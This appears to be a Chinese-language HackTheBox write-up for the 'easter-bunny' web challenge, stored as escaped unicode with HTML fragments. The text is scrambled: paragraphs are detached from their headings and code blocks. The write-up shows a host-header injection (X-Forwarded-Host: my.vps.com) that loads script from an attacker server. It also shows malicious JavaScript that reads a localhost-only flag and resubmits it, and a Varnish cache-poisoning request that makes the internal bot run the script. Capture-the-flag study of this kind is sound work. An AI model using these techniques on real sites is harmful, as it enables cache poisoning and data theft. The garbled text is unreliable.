hackthebox\u4e0a\u7684web\u9776\u6a5f\uff0c\u540d\u7a31\u70ba \u6b64\u76ee\u6a19\u767c\u73fe2\u500b\u5b89\u5168\u98a8\u96aa<\/p>\n\n\n\n \u9650\u5236127.0.0.1\u624d\u80fd\u8b80\u53d6<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u5206\u6790\u7db2\u7ad9\u4ee3\u78bc\u5167\u5bb9\u767c\u73feflag\u5728message\/3\u5167\uff0c\u4e26\u4e14\u53ea\u6709127.0.0.1\u80fd\u8b80\u53d6\uff0c\u6240\u4ee5\u8981\u60f3\u8fa6\u6cd5\u53d6\u5f97messsage\/3\u7684\u5167\u5bb9<\/p>\n\n\n\n <\/p>\n\n\n\n \u8a2a\u554f\u7db2\u7ad9\u6642\u53ef\u4ee5\u767c\u73fe\u6703\u53bb\u8b80\u53d6viewletter.js\uff0c\u800c\u4e14\u8a72\u76ee\u6a19\u6709express\u7684\u5f31\u9ede\uff0c\u56e0\u6b64\u53ef\u4ee5\u900f\u904eX-Forwarded-host\u6539\u8b8a\u4ee3\u78bc\u4e2dreq.hostname\u5167\u7684\u503c<\/p>\n\n\n\n \u6240\u4ee5\u5728\u8acb\u6c42\u6642\u589e\u52a0 <\/p>\n\n\n\n \u6e96\u5099\u4e00\u500bJS\u53bb\u8b80\u53d6messsage\/3\u7684flag\u5167\u5bb9\uff0c\u4e26\u5c07\u7d50\u679csubmit\u5230\u7559\u8a00\u7248\u4e2d\u3002\u7531\u65bc\u53ea\u6709127.0.0.1\u80fd\u8b80\u53d6\uff0c\u56e0\u6b64\u8b80\u53d6\u7db2\u5740\u8981\u6307\u5b9ahttp:\/\/127.0.0.1:80\/message\/3\u3002\u53e6\u5916\uff0c\u5728\u914d\u7f6e\u4e2d\u770b\u5230 CORS(app) \u8868\u793a\u53ef\u4ee5\u8de8\u57df\uff0c\u56e0\u6b64\u53ef\u4ee5\u5728\u60e1\u610fjs\u4e2d\u4f7f\u7528fetch\u8a9e\u6cd5<\/p>\n\n\n\n \u5728\u653b\u64ca\u8005\u670d\u52d9\u5668my.vps.com\u4e0a\u589e\u52a0viewletter.js \u5982\u4e0b<\/p>\n\n\n\n <\/p>\n\n\n\n \u5206\u6790\u76ee\u6a19\u767c\u73fe\u4f7f\u7528vcl\uff0c\u56e0\u6b64\u53ef\u5229\u7528varnish\u7684\u5f31\u9ede\u5efa\u7acb\u60e1\u610f\u7de9\u5b58\uff0c\u4e4b\u5f8c\u53ea\u8981\u5b58\u53d6\u8a72\u4f4d\u7f6e\u5c31\u6703\u4f7f\u7528\u60e1\u610f\u7de9\u5b58\u5167\u7684\u653b\u64ca\u6307\u4ee4\u3002<\/p>\n\n\n\n \u5206\u6790\u7559\u8a00\u6578\u8207id\u7684\u95dc\u4fc2\u53ef\u4ee5\u767c\u73feid\u4ee3\u8868\u76ee\u524d\u7559\u8a00\u6578\u91cf\uff0c\u56e0\u6b64\u65b0\u7684\u7559\u8a00id\u5c31\u662fid+1\uff0c\u7531\u65bc\u4ee3\u78bc\u5728\u63d0\u4ea4\u6642\u6703\u53bb\u8b80\u53d6id+1\u7684\u4fe1\u606f\uff0c\u6240\u4ee5\u6211\u5011\u53ef\u4ee5\u8981\u5728\u672a\u4f86\u4ee3\u78bc\u6703\u8b80\u53d6\u7684\u7db2\u5740\u505a\u60e1\u610f\u7de9\u5b58\u3002<\/p>\n\n\n\n \u5047\u5982\u76ee\u524d\u7559\u8a00\u6578\u662f10\uff0c\u5247\u6839\u64da\u4ee5\u4e0b\u898f\u5247\u767c\u9001\u8acb\u6c42\u4ee5\u5efa\u7acb\u60e1\u610f\u7de9\u5b58<\/p>\n\n\n\n \u73fe\u5728127.0.0.1\/letters?id=11\u5df1\u7de9\u5b58\u4e86my.vps.com\/viewletter.js \u7684\u653b\u64ca\u6307\u4ee4\uff0c\u53ea\u8981\u5b58\u53d6\u8a72\u4f4d\u7f6e\u5c31\u6703\u5e38\u8a66\u8b80\u53d6message\/3\u7684flag\u3002\u4f46\u5982\u679c\u662f\u5f9e\u5916\u7db2\u5b58\u53d6\u6c92\u7528\uff0c\u5fc5\u9808\u5f9e\u5167\u7db2\u5b58\u53d6\u624d\u884c\uff0c\u4e5f\u5c31\u662f\u8b93\u76ee\u6a19\u81ea\u5df1\u53bb\u57f7\u884c\u3002<\/p>\n\n\n\n <\/p>\n\n\n\n \u5206\u6790\u4ee5\u4e0b\u4ee3\u78bc\u53ef\u4ee5\u767c\u73fe\u8acb\u6c42submit\u5f8c\uff0c\u6703\u53bb\u8b80\u53d6127.0.0.1\/letters\uff0c\u9019\u7b26\u5408\u8b93\u76ee\u6a19\u81ea\u5df1\u53bb\u57f7\u884c\u7684\u689d\u4ef6\uff0c\u5f9e\u5167\u7db2\u5b58\u53d6<\/p>\n\n\n\n \u56e0\u6b64\u96a8\u4fbf\u63d0\u4ea4\u4e00\u500bsubmit\uff0c\u539f\u672c\u7559\u8a00\u7e3d\u657810\u5c31\u6703\u8b8a11\uff0c\u5c0e\u81f4\u4ee3\u78bc\u5167\u7684\u904b\u4f5c\u6703\u81ea\u5df1\u8b80\u53d6http:\/\/127.0.0.1\/letters?id=11\u3002<\/p>\n\n\n\n \u539f\u672c\u8b80\u53d6127.0.0.1\/letters?id=11\u4e0d\u6703\u6709\u4efb\u4f55\u554f\u984c\uff0c\u4f46\u8a72\u7db2\u5740\u525b\u525b\u5df1\u7d93\u7de9\u5b58\u4e2d\u6bd2\u4e86\uff0c\u56e0\u6b64\u4ed6\u6703\u57f7\u884c\u60e1\u610fviewletter.js\uff0c\u8b80\u53d6message\/3\u7684flag\u5167\u5bb9\u4e26\u63d0\u4ea4\u5230\u4e0b\u4e00\u5247\u7559\u8a00\u4e2d\uff0c\u56e0\u6b64\u53ea\u8981\u770b\u6700\u65b0\u7684\u7559\u8a00\u5c31\u80fd\u770b\u5230flag<\/p>\n\n\n\n web\u7de9\u5b58\u7cfb\u7d71\u670d\u52d9\u5668\uff0c\u4f7f\u7528VCL\u4f86\u8a2d\u5b9a\u7de9\u5b58\u898f\u5247<\/p>\n\n\n\n \u4ee5\u4e0b\u662f\u9ed8\u8a8d\u7684VCL<\/p>\n\n\n\n \u9ed8\u8a8d\u7684hash\u662furl+host\u6216url+ip\uff0c\u63db\u53e5\u8a71\u8aaa,\u540c\u4e00\u500bHOST\u8a2a\u554f\u540c\u4e00\u500bURL\u6703\u6709\u7de9\u5b58<\/p>\n\n\n\n \u4ee5\u4e0a\u9ed8\u8a8d\u914d\u7f6e\u6709\u4e00\u4e9b\u5b89\u5168\u98a8\u96aa<\/p>\n\n\n\n <\/p>\n\n\n\n \u4e00\u7a2enode.js\u7684web\u61c9\u7528\u7a0b\u5e8f\u6846\u67b6<\/p>\n\n\n\n \u5728express\u7684\u5b98\u65b9\u6587\u6a94\u4e2d\u63d0\u5230\uff0c\u5982\u679ctrust proxy\u4e0d\u7b49false\u7684\u8a71\uff0creq.hostname\u53ef\u4ee5\u901a\u904ex-forwarded-host\u53d6\u5f97\uff0c\u9019\u8868\u793a\u53ef\u4ee5\u507d\u9020req.hostname\u53bb\u57f7\u884c\u7279\u5b9ahostname\u7684\u60e1\u610fjs <\/p>\n\n\n\neaster-bunny<\/code>\uff0c\u60c5\u5883\u662f\u7559\u8a00\u7248<\/p>\n\n\n\n\u5b89\u5168\u98a8\u96aa<\/h3>\n\n\n\n
\n
\u4fdd\u8b77\u6a5f\u5236<\/h3>\n\n\n\n
\u5b89\u5168\u512a\u5316\u5efa\u8b70 <\/h3>\n\n\n\n
\n
\n\n\n\n\u653b\u64ca\u624b\u6cd5<\/h2>\n\n\n\n
\u53ef\u4efb\u610f\u64cd\u4f5ccdn\u4f4d\u7f6e<\/h3>\n\n\n\n
router.get(\"\/letters\", (req, res) => {\n return res.render(\"viewletters.html\", {\n cdn: `${req.protocol}:\/\/${req.hostname}:${req.headers[\"x-forwarded-port\"] ?? 80}\/static\/`,\n });\n});<\/code><\/pre>\n\n\n\nX-Forwarded-Host : my.vps.com<\/code>\uff0c\u6703\u767c\u73fe\u8b80\u53d6viewletter.js\u7684\u4f86\u6e90\u8b8a\u6210my.vps.com\uff0c\u5982\u4e0b\uff0c\u9019\u8868\u793a\u7db2\u7ad9\u53ef\u4ee5\u57f7\u884c\u4efb\u4f55\u4f86\u6e90\u7684JS<\/p>\n\n\n\n<!-- <script src=\"viewletter.js\"><\/script> -->\n<script src=\"http:\/\/my.vps.com\/viewletter.js\"><\/script><\/code><\/pre>\n\n\n\n\u6e96\u5099\u60e1\u610fJS<\/h3>\n\n\n\n
fetch(\"http:\/\/127.0.0.1:80\/message\/3\").then((r) => {\n\u00a0 \u00a0 return r.text();\n}).then((x) => {\n\u00a0 \u00a0 fetch(\"http:\/\/127.0.0.1:80\/submit\", {\n\u00a0 \u00a0 \u00a0 \u00a0 \"headers\": {\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \"content-type\": \"application\/json\"\n\u00a0 \u00a0 \u00a0 \u00a0 },\n\u00a0 \u00a0 \u00a0 \u00a0 \"body\": x,\n\u00a0 \u00a0 \u00a0 \u00a0 \"method\": \"POST\",\n\u00a0 \u00a0 \u00a0 \u00a0 \"mode\": \"cors\",\n\u00a0 \u00a0 \u00a0 \u00a0 \"credentials\": \"omit\"\n\u00a0 \u00a0 });\n});<\/code><\/pre>\n\n\n\n\u5efa\u7acb\u60e1\u610f\u7de9\u5b58<\/h3>\n\n\n\n
\n
GET letters?id=11 HTTP\/1.1\nhost:127.0.0.1\nX-Forwarded-Host\": my.vps.com<\/code><\/pre>\n\n\n\n\u89f8\u767c\u60e1\u610f\u7de9\u5b58<\/h3>\n\n\n\n
router.post(\"\/submit\", async (req, res) => {\n const { message } = req.body;\n if (message) {\n return db.insertMessage(message)\n .then(async inserted => {\n try {\n botVisiting = true;\n await visit(`http:\/\/127.0.0.1\/letters?id=${inserted.lastID}`, authSecret);<\/code><\/pre>\n\n\n\n
\n\n\n\n\u88dc\u5145\u8aaa\u660e<\/h2>\n\n\n\n
Varnish<\/h3>\n\n\n\n
sub vcl_hash {\n\nhash_data(req.url);\nif (req.http.host) {\n hash_data(req.http.host);\n} else {\n hash_data(server.ip);\n}\n\nreturn (lookup);\n}<\/code><\/pre>\n\n\n\nexpress<\/h3>\n\n\n\n